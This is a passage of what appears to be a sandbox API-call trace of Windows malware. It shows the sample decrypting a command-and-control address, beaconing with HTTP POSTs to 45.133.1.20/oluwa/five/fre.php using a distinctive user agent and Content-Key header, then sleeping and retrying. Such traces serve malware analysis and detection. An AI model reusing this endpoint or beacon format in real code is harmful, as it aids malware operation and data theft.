ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0237.213] GetProcessHeap () returned 0x6a0000 [0237.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0237.214] GetProcessHeap () returned 0x6a0000 [0237.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0237.215] GetProcessHeap () returned 0x6a0000 [0237.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0237.215] GetProcessHeap () returned 0x6a0000 [0237.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0237.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.217] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.224] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0237.236] GetProcessHeap () returned 0x6a0000 [0237.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0237.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.237] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0237.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.238] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.239] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.239] GetProcessHeap () returned 0x6a0000 [0237.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0237.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.241] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0237.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.248] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0237.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.249] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0237.249] GetProcessHeap () returned 0x6a0000 [0237.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0237.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.251] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0237.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.252] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0237.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.253] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0237.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.255] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0237.255] GetProcessHeap () returned 0x6a0000 [0237.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0237.255] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0237.255] GetProcessHeap () returned 0x6a0000 [0237.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0237.255] socket (af=2, type=1, protocol=6) returned 0x774 [0237.255] connect (s=0x774, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0237.289] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0237.289] GetProcessHeap () returned 0x6a0000 [0237.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0237.289] GetProcessHeap () returned 0x6a0000 [0237.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf20 [0237.290] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0237.291] wvsprintfA (in: param_1=0x6daf20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0237.292] GetProcessHeap () returned 0x6a0000 [0237.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4738 [0237.292] GetProcessHeap () returned 0x6a0000 [0237.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf20 | out: hHeap=0x6a0000) returned 1 [0237.292] GetProcessHeap () returned 0x6a0000 [0237.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0237.292] GetProcessHeap () returned 0x6a0000 [0237.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf20 [0237.294] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0237.295] wvsprintfA (in: param_1=0x6daf20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0237.295] GetProcessHeap () returned 0x6a0000 [0237.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0237.295] GetProcessHeap () returned 0x6a0000 [0237.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf20 | out: hHeap=0x6a0000) returned 1 [0237.295] send (s=0x774, buf=0x6bd460*, len=242, flags=0) returned 242 [0237.296] send (s=0x774, buf=0x6bb998*, len=159, flags=0) returned 159 [0237.296] GetProcessHeap () returned 0x6a0000 [0237.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0237.296] recv (in: s=0x774, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0237.385] GetProcessHeap () returned 0x6a0000 [0237.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0237.386] GetProcessHeap () returned 0x6a0000 [0237.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0237.386] GetProcessHeap () returned 0x6a0000 [0237.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4738 | out: hHeap=0x6a0000) returned 1 [0237.387] GetProcessHeap () returned 0x6a0000 [0237.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0237.387] closesocket (s=0x774) returned 0 [0237.389] GetProcessHeap () returned 0x6a0000 [0237.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0237.389] GetProcessHeap () returned 0x6a0000 [0237.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0237.389] GetProcessHeap () returned 0x6a0000 [0237.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0237.389] GetProcessHeap () returned 0x6a0000 [0237.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0237.390] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14a8) returned 0x774 [0237.391] Sleep (dwMilliseconds=0xea60) [0237.393] GetProcessHeap () returned 0x6a0000 [0237.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0237.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.394] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.417] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0237.459] GetProcessHeap () returned 0x6a0000 [0237.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9cf8 [0237.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.461] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b9cf8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0237.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.464] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.468] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.468] GetProcessHeap () returned 0x6a0000 [0237.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9cf8 | out: hHeap=0x6a0000) returned 1 [0237.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.470] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0237.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.611] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0237.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.613] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0237.613] GetProcessHeap () returned 0x6a0000 [0237.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0237.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.614] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0237.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.616] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0237.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.617] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0237.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.618] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0237.618] GetProcessHeap () returned 0x6a0000 [0237.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0237.618] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0237.619] GetProcessHeap () returned 0x6a0000 [0237.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0237.619] GetProcessHeap () returned 0x6a0000 [0237.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0237.620] GetProcessHeap () returned 0x6a0000 [0237.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0237.621] GetProcessHeap () returned 0x6a0000 [0237.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0237.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.622] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.629] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0237.638] GetProcessHeap () returned 0x6a0000 [0237.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0237.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.640] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0237.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.641] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.642] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.642] GetProcessHeap () returned 0x6a0000 [0237.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0237.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.644] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0237.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.646] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0237.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.647] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0237.647] GetProcessHeap () returned 0x6a0000 [0237.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0237.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.648] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0237.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.650] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0237.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.652] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0237.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.654] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0237.654] GetProcessHeap () returned 0x6a0000 [0237.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0237.654] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0237.654] GetProcessHeap () returned 0x6a0000 [0237.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0237.654] socket (af=2, type=1, protocol=6) returned 0x778 [0237.655] connect (s=0x778, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0237.683] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0237.683] GetProcessHeap () returned 0x6a0000 [0237.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0237.683] GetProcessHeap () returned 0x6a0000 [0237.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf20 [0237.684] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0237.685] wvsprintfA (in: param_1=0x6daf20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0237.686] GetProcessHeap () returned 0x6a0000 [0237.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4c78 [0237.686] GetProcessHeap () returned 0x6a0000 [0237.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf20 | out: hHeap=0x6a0000) returned 1 [0237.687] GetProcessHeap () returned 0x6a0000 [0237.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0237.687] GetProcessHeap () returned 0x6a0000 [0237.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf20 [0237.687] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0237.688] wvsprintfA (in: param_1=0x6daf20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0237.689] GetProcessHeap () returned 0x6a0000 [0237.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0237.689] GetProcessHeap () returned 0x6a0000 [0237.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf20 | out: hHeap=0x6a0000) returned 1 [0237.689] send (s=0x778, buf=0x6bd460*, len=242, flags=0) returned 242 [0237.690] send (s=0x778, buf=0x6bb998*, len=159, flags=0) returned 159 [0237.690] GetProcessHeap () returned 0x6a0000 [0237.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0237.690] recv (in: s=0x778, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0237.809] GetProcessHeap () returned 0x6a0000 [0237.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0237.811] GetProcessHeap () returned 0x6a0000 [0237.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0237.812] GetProcessHeap () returned 0x6a0000 [0237.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4c78 | out: hHeap=0x6a0000) returned 1 [0237.812] GetProcessHeap () returned 0x6a0000 [0237.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0237.812] closesocket (s=0x778) returned 0 [0237.813] GetProcessHeap () returned 0x6a0000 [0237.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0237.813] GetProcessHeap () returned 0x6a0000 [0237.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0237.813] GetProcessHeap () returned 0x6a0000 [0237.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0237.814] GetProcessHeap () returned 0x6a0000 [0237.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0237.814] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14ac) returned 0x778 [0237.816] Sleep (dwMilliseconds=0xea60) [0237.818] GetProcessHeap () returned 0x6a0000 [0237.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0237.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.821] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.829] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0237.844] GetProcessHeap () returned 0x6a0000 [0237.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0237.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.846] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0237.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.847] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.848] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.848] GetProcessHeap () returned 0x6a0000 [0237.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0237.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.850] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0237.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.851] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0237.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.853] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0237.853] GetProcessHeap () returned 0x6a0000 [0237.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0237.854] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.931] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0237.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.933] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0237.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.934] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0237.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.935] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0237.935] GetProcessHeap () returned 0x6a0000 [0237.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0237.935] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0237.936] GetProcessHeap () returned 0x6a0000 [0237.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0237.937] GetProcessHeap () returned 0x6a0000 [0237.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0237.937] GetProcessHeap () returned 0x6a0000 [0237.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0237.938] GetProcessHeap () returned 0x6a0000 [0237.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0237.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.939] 